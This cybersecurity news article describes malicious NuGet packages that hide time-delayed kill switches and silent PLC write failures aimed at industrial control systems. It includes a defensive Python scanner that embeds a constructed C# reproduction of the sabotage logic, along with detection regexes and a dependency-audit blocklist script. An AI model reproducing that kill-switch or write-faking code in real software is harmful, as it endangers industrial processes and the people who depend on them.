Cyber Security News

Weaponized NuGet Packages Inject Time-Delayed Destructive Payloads to Attack ICS Systems

A supply chain attack has emerged that targets industrial control systems through deliberately malicious .NET packages distributed via NuGet.

On November 5, 2025, researchers at Socket disclosed nine malicious NuGet packages carrying time-delayed destructive payloads aimed at database applications and industrial control systems.

Published under the NuGet alias shanhai666 between 2023 and 2024, the packages accumulated nearly 9,500 downloads before detection. Downloads are not installs, but a count that size means the packages reached a real, if unmeasured, number of build and production environments before anyone looked at them closely.

Figure: shanhai666 NuGet profile, showing packages that appear legitimate and benign (Source: Socket.dev)

The threat actor's approach deliberately blurs the line between legitimate functionality and malicious intent.

Each package provides complete, working implementations of their advertised features, including database repository patterns, LINQ support, pagination methods, and asynchronous operations.

Because roughly 99% of each package is genuine, working code, it passes code review and earns developer trust while concealing about 20 lines of malicious logic buried among thousands of lines of legitimate implementation.

Since the packages work exactly as advertised, they deliver real value that encourages adoption and, once the malware activates, delays the moment anyone suspects the dependency rather than the application.

The most dangerous package, Sharp7Extend, targets industrial PLCs directly with two sabotage mechanisms aimed at safety-critical systems.

It combines immediate random process termination with silent write failures that begin 30 to 90 minutes after installation.

The implications for manufacturing environments are severe: a dropped or faked write can affect actuators, setpoints, and safety system operations.

Socket security analysts identified the malware after examining package behavior patterns and discovering the probabilistic execution logic embedded within extension methods.

Attack methodology

The methodology marks a step up in supply chain threat sophistication. Rather than hiding the payload entirely, the attacker embedded it in C# extension methods that transparently wrap database and PLC operations, so the malicious check runs on every call without the caller ever invoking it explicitly.

Every database query or PLC operation routed through these methods first checks the current date against hardcoded trigger dates, which range from August 2027 to June 2028 across the packages.

Once a trigger date has passed, each call draws a random number between 1 and 100. If it exceeds 80, which happens on 20% of calls, Process.GetCurrentProcess().Kill() executes and the entire application terminates without warning.

Sharp7Extend's write sabotage uses a delay mechanism dressed up as configuration-based control.

On installation, a random grace period of 30 to 90 minutes begins, during which all operations behave normally, so initial deployment testing succeeds.

Once the window closes, 80% of write operations fail silently: the call returns zero instead of the actual result, producing data integrity problems with no error message that points at the dependency.
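The logic described in this section, reduced to a checkable pattern. The block below is an added example written for this page, not Socket's tooling and not the package source: SAMPLE is a constructed C# fragment that reproduces the described behaviour (hardcoded trigger date, a 1 to 100 draw with a 20% kill branch, a 30 to 90 minute grace period, a faked zero return), BENIGN is a harmless extension method for comparison, and the Python scanner flags the co-occurrence of a wall-clock or delay check, a random draw used as a branch condition, and process termination within a few lines of each other. The S7Client.DBWrite call is the Sharp7 write API as assumed here, and the geometric-expectation helper at the end converts the per-call 20% into an expected time to crash at a given query rate.

```python
"""Heuristic scanner for the time-bomb / probabilistic-sabotage pattern:
a wall-clock or grace-period check, a random draw used as a branch
condition, and termination or a faked return value inside C# extension
methods.  Example code for this page; SAMPLE and BENIGN are constructed
illustrations, not the shanhai666 package source."""
import re
from dataclasses import dataclass

# Constructed C# reproducing the described logic (not the real package code).
SAMPLE = """public static class QueryExtensions
{
    private static readonly DateTime Trigger = new DateTime(2027, 8, 8);
    public static IEnumerable<T> ExecuteSafe<T>(this IDbConnection conn, string sql)
    {
        if (DateTime.Now > Trigger && new Random().Next(1, 101) > 80)
        {
            Process.GetCurrentProcess().Kill();
        }
        return conn.Query<T>(sql);
    }
}
public static class PlcExtensions
{
    private static readonly DateTime Installed = DateTime.Now;
    private static readonly TimeSpan Grace = TimeSpan.FromMinutes(new Random().Next(30, 91));
    public static int WriteSafe(this S7Client client, int db, int start, byte[] buffer)
    {
        if (DateTime.Now - Installed > Grace && new Random().Next(1, 101) <= 80)
        {
            return 0;  // silent failure: nothing written, no error raised
        }
        return client.DBWrite(db, start, buffer.Length, buffer);
    }
}
"""

# Constructed harmless extension method: uses the clock, but no random branch.
BENIGN = """public static class AuditExtensions
{
    public static void LogWrite(this S7Client client, int db) =>
        Console.WriteLine($"{DateTime.UtcNow:o} wrote DB{db}");
}
"""

PATTERNS = {
    "hardcoded_date": re.compile(r'new\s+DateTime\s*\(\s*20\d\d\s*,|DateTime\.Parse\s*\(\s*"20\d\d'),
    "wall_clock_compare": re.compile(r'DateTime\.(?:Now|UtcNow|Today)\b.*[<>]=?'),
    "probabilistic_branch": re.compile(r'\.Next\s*\(\s*\d+\s*,\s*\d+\s*\)\s*[<>]=?\s*\d+'),
    "process_termination": re.compile(r'Process\.GetCurrentProcess\(\)\.Kill\(\)|Environment\.(?:Exit|FailFast)\('),
    "delay_window": re.compile(r'TimeSpan\.From(?:Minutes|Hours|Seconds)\s*\('),
    "extension_method": re.compile(r'\(\s*this\s+[\w.<>\[\]]+\s+\w+'),
}

@dataclass
class Finding:
    line: int
    category: str
    text: str

def scan_lines(source):
    """One Finding per (line, category) that matches a pattern."""
    return [Finding(no, cat, line.strip())
            for no, line in enumerate(source.splitlines(), 1)
            for cat, rx in PATTERNS.items() if rx.search(line)]

def correlate(findings, window=8):
    """Alert on each random draw used as a branch condition that sits within
    `window` lines of a wall-clock or delay check.  Termination in the same
    window makes it a kill switch; otherwise it is conditional sabotage
    (for example a faked return value)."""
    alerts = []
    for f in findings:
        if f.category != "probabilistic_branch":
            continue
        near = {g.category for g in findings if g is not f and abs(g.line - f.line) <= window}
        if not near & {"wall_clock_compare", "hardcoded_date", "delay_window"}:
            continue
        alerts.append({
            "line": f.line,
            "kind": "kill_switch" if "process_termination" in near else "conditional_sabotage",
            "in_extension_method": "extension_method" in near,
            "signals": sorted(near),
        })
    return alerts

def expected_calls_before_kill(kill_prob):
    """Geometric expectation: mean number of gated calls until the first kill (1/p)."""
    return 1.0 / kill_prob

def expected_seconds_to_crash(calls_per_hour, kill_prob=0.2):
    """Mean time from the trigger date to termination at a given call rate."""
    return expected_calls_before_kill(kill_prob) * 3600.0 / calls_per_hour

if __name__ == "__main__":
    for alert in correlate(scan_lines(SAMPLE)):
        print(alert)
    print("benign:", correlate(scan_lines(BENIGN)), "seconds at 300/h:", expected_seconds_to_crash(300))
```

Run it over decompiled sources (for example ILSpy output of the restored .nupkg assemblies) as well as over your own code. The checks are heuristics: a payload that compares ticks instead of a DateTime literal, or draws its random number elsewhere, will slip past them, so treat a hit as a reason to read the method, not as a verdict. The expectation helper is why a 20% per-call kill is fast in practice: a gated path dies after five calls on average, which at a few hundred calls per hour is minutes, not days.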

For industrial environments that depend on PLC writes to control physical processes, this is a direct threat to operational continuity and safety. The damage also extends beyond the immediate failure.

The staggered activation windows mean developers who installed the packages in 2024 will have moved to other projects or companies by the time the database payloads trigger in 2027, which makes attribution and forensic investigation far harder: nobody left on the team will remember adding the dependency.

With a 20% kill probability per call, a production application executing hundreds of queries per hour can expect to crash within minutes of the trigger date; manufacturing environments will see process termination and silent write failures together, a combination that looks like intermittent hardware trouble rather than a compromised library.

Organizations should audit their dependency trees, including transitive dependencies and lock files, for the nine packages, and add dependency scanning before merge that looks specifically for time-based logic, probabilistic execution paths, and packages whose names piggyback on industrial control libraries.
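One way to do the dependency audit this paragraph calls for, as an added example that is not Socket's or NuGet's tooling. It reads PackageReference entries from a .csproj and every direct and transitive entry from packages.lock.json, flags exact hits against a blocklist, and separately flags any package whose id wraps a known ICS library id, which is the shape Sharp7Extend has relative to Sharp7. The sample project and lock files are constructed, the NuGet id Sharp7 for the legitimate Siemens S7 client is an assumption, and since the article names only Sharp7Extend, the other eight ids must be copied from the Socket advisory into BLOCKLIST rather than guessed.

```python
"""Dependency audit for a .NET project: walks PackageReference entries in a
.csproj and every direct and transitive entry in packages.lock.json, then
flags exact blocklist hits and ids that wrap a known ICS library id.
Example code for this page; CSPROJ and LOCK below are constructed samples.
BLOCKLIST holds only the id the article names; append the remaining eight
from the Socket advisory rather than guessing them."""
import json
import xml.etree.ElementTree as ET

BLOCKLIST = {"sharp7extend"}   # lower-case NuGet ids; extend from the advisory
ICS_LIBRARIES = {"sharp7"}     # assumption: NuGet id of the legitimate Siemens S7 client

# Constructed sample project file (versions are placeholders).
CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Sharp7" Version="1.1.0" />
    <PackageReference Include="Sharp7Extend" Version="1.0.0" />
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
  </ItemGroup>
</Project>
"""

# Constructed sample in the packages.lock.json layout (contentHash values are placeholders).
LOCK = """{
  "version": 1,
  "dependencies": {
    "net8.0": {
      "Sharp7": {"type": "Direct", "requested": "[1.1.0, )", "resolved": "1.1.0", "contentHash": "x"},
      "Sharp7Extend": {"type": "Direct", "requested": "[1.0.0, )", "resolved": "1.0.0", "contentHash": "x"},
      "Newtonsoft.Json": {"type": "Transitive", "resolved": "13.0.3", "contentHash": "x"}
    }
  }
}
"""

def packages_from_csproj(xml_text):
    """Yield (id, version, 'Direct') for each PackageReference in an SDK-style project."""
    root = ET.fromstring(xml_text)
    for ref in root.iter("PackageReference"):
        name = ref.get("Include") or ref.get("Update")
        if name:
            yield name, ref.get("Version") or "", "Direct"

def packages_from_lock(lock_text):
    """Yield (id, resolved version, type) for every framework in packages.lock.json,
    which is where transitive packages show up that the .csproj never lists."""
    data = json.loads(lock_text)
    for deps in data.get("dependencies", {}).values():
        for name, info in deps.items():
            yield name, info.get("resolved", ""), info.get("type", "")

def audit(entries, blocklist=BLOCKLIST, ics_libraries=ICS_LIBRARIES):
    """One finding per suspicious entry; a blocklist hit takes precedence over the heuristic."""
    findings = []
    for name, version, kind in entries:
        low = name.lower()
        if low in blocklist:
            findings.append({"package": name, "version": version, "type": kind, "reason": "known_malicious"})
            continue
        for lib in sorted(ics_libraries):
            # An id that contains a real ICS library id but is not that library deserves a look.
            if lib in low and low != lib:
                findings.append({"package": name, "version": version, "type": kind,
                                 "reason": f"wraps_ics_library:{lib}"})
                break
    return findings

if __name__ == "__main__":
    entries = list(packages_from_csproj(CSPROJ)) + list(packages_from_lock(LOCK))
    for finding in audit(entries):
        print(finding)
```

Check the lock file and not only the project file: a malicious package pulled in transitively never appears as a PackageReference. Setting RestorePackagesWithLockFile to true in the project makes NuGet write packages.lock.json, so the resolved graph is committed and can be diffed in review. The wrapper heuristic is deliberately loose; it exists to surface candidates for a human to read, which is exactly how a Sharp7Extend-style name would have stood out next to the library it extends.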


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
